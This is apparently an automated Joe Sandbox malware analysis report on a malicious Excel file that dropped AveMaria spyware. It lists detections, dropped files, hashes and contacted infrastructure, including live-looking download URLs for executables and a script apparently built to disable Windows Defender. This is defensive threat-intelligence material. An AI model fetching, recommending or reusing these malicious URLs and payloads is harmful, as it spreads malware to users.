          C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe19%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe30%ReversingLabsByteCode-MSIL.Spyware.AveMaria
          C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe19%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe30%ReversingLabsByteCode-MSIL.Spyware.AveMaria
          C:\Users\user\AppData\Roaming\JrekdQ.exe19%MetadefenderBrowse

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          37.2.ars4t7gFPGrepVgh.exe.230000.0.unpack100%AviraHEUR/AGEN.1109526Download File
          35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack100%AviraHEUR/AGEN.1135947Download File
          31.2.eyBLwzbrUF1mwXoy.exe.b0000.0.unpack100%AviraHEUR/AGEN.1109526Download File

          Domains

          SourceDetectionScannerLabelLink
          cutt.ly0%VirustotalBrowse
          yz.videomarket.eu5%VirustotalBrowse
          gtp.bg0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://37.46.150.139/bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat4%VirustotalBrowse
          http://37.46.150.139/bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://gtp.bg/opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe0%Avira URL Cloudsafe
          http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          cutt.ly
          		172.67.8.238
          		truetrueunknown
          yz.videomarket.eu
          		185.157.162.81
          		truetrueunknown
          gtp.bg
          		195.191.149.103
          		truetrueunknown
          ip-api.com
          		208.95.112.1
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://37.46.150.139/bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.batfalse
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://gtp.bg/opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exefalse
            • Avira URL Cloud: safe
            		unknown
            http://ip-api.com/json/false
              		high
              http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exetrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.piriform.com/ccleanerpowershell.exe, 00000007.00000002.2102767553.000000000034E000.00000004.00000020.sdmp, powershell.exe, 0000000D.00000002.2100756481.000000000032E000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmpfalse
                		high
                http://www.%s.comPApowershell.exe, 00000007.00000002.2105110121.00000000022E0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122564392.0000000002440000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101215112.0000000002370000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2152867669.00000000022F0000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		low
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000007.00000002.2105110121.00000000022E0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122564392.0000000002440000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101215112.0000000002370000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2152867669.00000000022F0000.00000002.00000001.sdmpfalse
                  		high
                  http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000007.00000002.2102767553.000000000034E000.00000004.00000020.sdmp, powershell.exe, 0000000D.00000002.2100756481.000000000032E000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmpfalse
                    		high
                    http://www.piriform.com/ccleanerhttp://www.piripowershell.exe, 00000007.00000002.2102819538.0000000000379000.00000004.00000020.sdmpfalse
                      		high
                      https://curl.haxx.se/docs/http-cookies.htmlsp.exefalse
                        		high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        172.67.8.238
                        		unknownUnited States
                        		13335CLOUDFLARENETUStrue
                        208.95.112.1
                        		unknownUnited States
                        		53334TUT-ASUSfalse
                        195.191.149.103
                        		unknownBulgaria
                        		201200SUPERHOSTING_ASBGtrue
                        185.157.162.81
                        		unknownSweden
                        		197595OBE-EUROPEObenetworkEuropeSEtrue
                        37.46.150.139
                        		unknownMoldova Republic of
                        		8758IWAYCHfalse

                        General Information

                        Joe Sandbox Version:31.0.0 Red Diamond
                        Analysis ID:336545
                        Start date:06.01.2021
                        Start time:09:56:48
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 11m 50s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:spetsifikatsiya.xls
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:40
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winXLS@57/27@7/5
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 10.2% (good quality ratio 4.7%)
                        • Quality average: 26.5%
                        • Quality standard deviation: 31.3%
                        HCA Information:
                        • Successful, ratio: 72%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .xls
                        • Changed system and user locale, location and keyboard layout to French - France
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209, 93.184.221.240
                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        09:57:43API Interceptor485x Sleep call for process: powershell.exe modified
                        09:58:02API Interceptor1519x Sleep call for process: sp.exe modified
                        09:58:36API Interceptor3x Sleep call for process: schtasks.exe modified
                        09:59:03API Interceptor733x Sleep call for process: eyBLwzbrUF1mwXoy.exe modified
                        09:59:53API Interceptor46x Sleep call for process: ars4t7gFPGrepVgh.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        172.67.8.2381e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                          New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                            spetsifikatsiya.xlsGet hashmaliciousBrowse
                              file.xlsGet hashmaliciousBrowse
                                file.xlsGet hashmaliciousBrowse
                                  output.xlsGet hashmaliciousBrowse
                                    SecuriteInfo.com.Heur.20246.xlsGet hashmaliciousBrowse
                                      30689741.xlsGet hashmaliciousBrowse
                                        95773220855.xlsGet hashmaliciousBrowse
                                          MT-000137.xlsGet hashmaliciousBrowse
                                            MOT_507465.xlsGet hashmaliciousBrowse
                                              invoicedelivery20200912toxRG.xlsGet hashmaliciousBrowse
                                                inter.xlsGet hashmaliciousBrowse
                                                  machine.xlsGet hashmaliciousBrowse
                                                    urXFLGgIxo.xlsGet hashmaliciousBrowse
                                                      LIST_OF_IDs_FOR_PAYOUT.xlsGet hashmaliciousBrowse
                                                        wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                          wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                            wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Exploit.Siggen2.64979.3440.xlsGet hashmaliciousBrowse
                                                                208.95.112.1dpR3o92MH1.exeGet hashmaliciousBrowse
                                                                • ip-api.com/json/
                                                                ZZB5zuv1X0.exeGet hashmaliciousBrowse
                                                                • ip-api.com/json/
                                                                g4Anm805Wp.exeGet hashmaliciousBrowse
                                                                • ip-api.com/line/
                                                                y77ZcYP8V6.exeGet hashmaliciousBrowse
                                                                • ip-api.com/line/
                                                                FileSetup-v58.37.15.exeGet hashmaliciousBrowse
                                                                • ip-api.com/json
                                                                TOP URGENT RFQ 2021 Anson Yang.exeGet hashmaliciousBrowse
                                                                • ip-api.com/json/
                                                                update_2021-01-02_17-23.exeGet hashmaliciousBrowse
                                                                • ip-api.com/line/
                                                                sVJhb3GPcJ.exeGet hashmaliciousBrowse
                                                                • ip-api.com/json
                                                                Client1.exeGet hashmaliciousBrowse
                                                                • ip-api.com/json/
                                                                miner.exeGet hashmaliciousBrowse
                                                                • ip-api.com/json/
                                                                8H2nP7L2O9.exeGet hashmaliciousBrowse
                                                                • ip-api.com/json
                                                                OhGodAnETHlargementPill.sfx.exeGet hashmaliciousBrowse
                                                                • ip-api.com/json/
                                                                SecuriteInfo.com.ArtemisF23FB6308BD9.exeGet hashmaliciousBrowse
                                                                • ip-api.com/line
                                                                kETiCWwh0I.exeGet hashmaliciousBrowse
                                                                • ip-api.com/json
                                                                CjGhhGeHtu.exeGet hashmaliciousBrowse
                                                                • ip-api.com/xml
                                                                3rHcLCeu.exeGet hashmaliciousBrowse
                                                                • ip-api.com/json/
                                                                XIP4K07X5N.exeGet hashmaliciousBrowse
                                                                • ip-api.com/line/
                                                                vvf2pnwQzc.exeGet hashmaliciousBrowse
                                                                • ip-api.com/line/
                                                                6XNE5gElYE.exeGet hashmaliciousBrowse
                                                                • ip-api.com/line/
                                                                XF75HvMH33.exeGet hashmaliciousBrowse
                                                                • ip-api.com/line/

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                yz.videomarket.eudpR3o92MH1.exeGet hashmaliciousBrowse
                                                                • 185.157.162.81
                                                                ZZB5zuv1X0.exeGet hashmaliciousBrowse
                                                                • 185.157.162.81
                                                                zlkcd7HSQp.exeGet hashmaliciousBrowse
                                                                • 185.157.162.81
                                                                qdnLoWn1E8.exeGet hashmaliciousBrowse
                                                                • 185.157.162.81
                                                                ogYg79jWpR.exeGet hashmaliciousBrowse
                                                                • 185.157.162.81
                                                                fola(1).exeGet hashmaliciousBrowse
                                                                • 185.157.161.109
                                                                OQUToJt233.exeGet hashmaliciousBrowse
                                                                • 185.157.161.109
                                                                jbrowserQ.exeGet hashmaliciousBrowse
                                                                • 185.157.161.109
                                                                cutt.lyPayment Documents.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                Payment Documents.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                6Cprm97UTl.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                AdviceSlip.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                file.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                file.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                file.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                SecuriteInfo.com.Heur.20246.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                30689741.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                95773220855.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                ip-api.comdpR3o92MH1.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                ZZB5zuv1X0.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                g4Anm805Wp.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                y77ZcYP8V6.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                FileSetup-v58.37.15.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                TOP URGENT RFQ 2021 Anson Yang.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                update_2021-01-02_17-23.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                sVJhb3GPcJ.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                Client1.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                t-rex-0.19.5-win.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                miner.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                8H2nP7L2O9.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                PhoenixMiner_5.4c_Windows.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                OhGodAnETHlargementPill.sfx.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                SecuriteInfo.com.ArtemisF23FB6308BD9.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                kETiCWwh0I.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                CjGhhGeHtu.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                3rHcLCeu.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                XIP4K07X5N.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                vvf2pnwQzc.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                SUPERHOSTING_ASBGzlkcd7HSQp.exeGet hashmaliciousBrowse
                                                                • 195.191.148.123
                                                                machine.xlsGet hashmaliciousBrowse
                                                                • 195.191.148.123
                                                                SJNRsFNyLl.exeGet hashmaliciousBrowse
                                                                • 193.107.36.110
                                                                22DOC1.exeGet hashmaliciousBrowse
                                                                • 185.45.66.199
                                                                9invoice.exeGet hashmaliciousBrowse
                                                                • 195.191.149.84
                                                                http://ifems-bg.com/Past-Due-Invoices/Get hashmaliciousBrowse
                                                                • 91.196.124.23
                                                                https://linkto.ga/5PGet hashmaliciousBrowse
                                                                • 195.191.148.216
                                                                https://linkto.ga/5MGet hashmaliciousBrowse
                                                                • 195.191.148.216
                                                                OBE-EUROPEObenetworkEuropeSEDHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                                • 185.157.160.233
                                                                dpR3o92MH1.exeGet hashmaliciousBrowse
                                                                • 185.157.162.81
                                                                0qNSJXB8nG.exeGet hashmaliciousBrowse
                                                                • 185.157.162.81
                                                                Order_1101201918_AUTECH.exeGet hashmaliciousBrowse
                                                                • 185.157.161.86
                                                                7w7LwD8bqe.exeGet hashmaliciousBrowse
                                                                • 185.157.162.81
                                                                ZZB5zuv1X0.exeGet hashmaliciousBrowse
                                                                • 185.157.162.81
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 185.157.162.81
                                                                ptoovvKZ80.exeGet hashmaliciousBrowse
                                                                • 185.157.162.81
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 185.157.162.81
                                                                EnJsj6nuD4.exeGet hashmaliciousBrowse
                                                                • 185.157.162.81
                                                                AdviceSlip.xlsGet hashmaliciousBrowse
                                                                • 217.64.149.169
                                                                DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                                • 185.157.160.233
                                                                DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                                • 185.157.160.233
                                                                DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                                • 185.157.160.233
                                                                DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                                • 185.157.160.233
                                                                50404868-c352-422f-a608-7fd64b335eec.exeGet hashmaliciousBrowse
                                                                • 185.157.161.86
                                                                DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                                • 185.157.160.233
                                                                FedExs AWB#5305323204643.exeGet hashmaliciousBrowse
                                                                • 185.157.160.233
                                                                URGENT QUOTATION 473833057.exeGet hashmaliciousBrowse
                                                                • 185.157.160.233
                                                                P-O Doc #6620200947535257653.exeGet hashmaliciousBrowse
                                                                • 185.157.160.233
                                                                TUT-ASUSdpR3o92MH1.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                ZZB5zuv1X0.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                g4Anm805Wp.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                y77ZcYP8V6.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                FileSetup-v58.37.15.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                TOP URGENT RFQ 2021 Anson Yang.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                update_2021-01-02_17-23.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                sVJhb3GPcJ.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                Client1.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                miner.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                8H2nP7L2O9.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                OhGodAnETHlargementPill.sfx.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                SecuriteInfo.com.ArtemisF23FB6308BD9.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                kETiCWwh0I.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                CjGhhGeHtu.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                3rHcLCeu.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                XIP4K07X5N.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                vvf2pnwQzc.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                6XNE5gElYE.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                XF75HvMH33.exeGet hashmaliciousBrowse
                                                                • 208.95.112.1
                                                                CLOUDFLARENETUSShipping Document PL and BL003534.pptGet hashmaliciousBrowse
                                                                • 104.18.49.20
                                                                Inquiry-RFQ93847849-pdf.exeGet hashmaliciousBrowse
                                                                • 66.235.200.147
                                                                PO20002106.exeGet hashmaliciousBrowse
                                                                • 104.23.99.190
                                                                SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                                                • 172.67.187.112
                                                                COO_TPE0269320_image2020-12-31-055841.exeGet hashmaliciousBrowse
                                                                • 172.67.166.210
                                                                Payment Documents.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                DATA-480841.docGet hashmaliciousBrowse
                                                                • 104.18.61.59
                                                                eTrader-0.1.0.exeGet hashmaliciousBrowse
                                                                • 104.23.98.190
                                                                Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                                                • 104.18.61.59
                                                                eTrader-0.1.0.exeGet hashmaliciousBrowse
                                                                • 104.23.99.190
                                                                pack-91089 416755919.docGet hashmaliciousBrowse
                                                                • 104.18.61.59
                                                                Payment Documents.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                QPI-01458.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                LITmNphcCA.exeGet hashmaliciousBrowse
                                                                • 104.28.5.151
                                                                http://fake-cash-app-screenshot-generator.hostforjusteasy.funGet hashmaliciousBrowse
                                                                • 172.67.179.45
                                                                http://download2224.mediafire.com/5rqvtr7atabg/4ufxk777x7qfcdd/FastStoneCapturePortableTW_9.0_azo.exeGet hashmaliciousBrowse
                                                                • 104.16.203.237
                                                                http://click.freshwaterlive.info/campaign/clicked/MjgzNjAxMzU%3D__MTAxOA%3D%3D__MjY3NzY5Ng%3D%3D__MjI2/aHR0cDovL2JpdC5seS8ySk1GMUJk?c=28360135Get hashmaliciousBrowse
                                                                • 104.16.19.94
                                                                https://awattorneys-my.sharepoint.com/:b:/p/fgalante/EcRfEpzLM_tOh_Roewbwm9oB4JarWh_30QaPZLGUdNbnuw?e=4%3aqmwocp&at=9Get hashmaliciousBrowse
                                                                • 104.16.18.94
                                                                http://reppoflag.net/2307e0382f77c950a2.jsGet hashmaliciousBrowse
                                                                • 172.64.170.19

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                05af1f5ca1b87cc9cc9b25185115607dShipping Document PL and BL003534.pptGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                Payment Documents.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                6Cprm97UTl.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                DAT 2020_12_30.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                N.11389944 BS 05 gen 2021.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                PSX7103491.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                Beauftragung.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                1I72L29IL3F.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                Adjunto_2021.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                Dok 0501 012021 Q_93291.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                invoice.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exedpR3o92MH1.exeGet hashmaliciousBrowse
                                                                  C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exedpR3o92MH1.exeGet hashmaliciousBrowse
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exedpR3o92MH1.exeGet hashmaliciousBrowse
                                                                      C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exedpR3o92MH1.exeGet hashmaliciousBrowse
                                                                        C:\Users\user\AppData\Roaming\JrekdQ.exedpR3o92MH1.exeGet hashmaliciousBrowse

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                          Category:dropped
                                                                          Size (bytes):58936
                                                                          Entropy (8bit):7.994797855729196
                                                                          Encrypted:true
                                                                          SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                          MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                          SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                          SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                          SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                          Malicious:false
                                                                          Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):326
                                                                          Entropy (8bit):3.114736388632894
                                                                          Encrypted:false
                                                                          SSDEEP:6:kKTswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:7vkPlE99SNxAhUegeT2
                                                                          MD5:0BB35F55A536D3985F509EB3782968C7
                                                                          SHA1:DFC6C55ABA8740465413396C2C5F24CB42044A5C
                                                                          SHA-256:E6ADDDFFDDFB3EE69F5F60E4C2C912981DF7C8EFC7A3B7A8A879015E1A98537D
                                                                          SHA-512:8B114599EBEE2CD2008D85B5CFD9F8E63F0E6404D9A7A802B1062A541057D9E180A6853E745981562AC7343BFA3025D55807D4B48E6529C958711F9B9859F26C
                                                                          Malicious:false
                                                                          Preview: p...... ........HD"qU...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe
                                                                          Process:C:\Users\user\AppData\Roaming\sp.exe
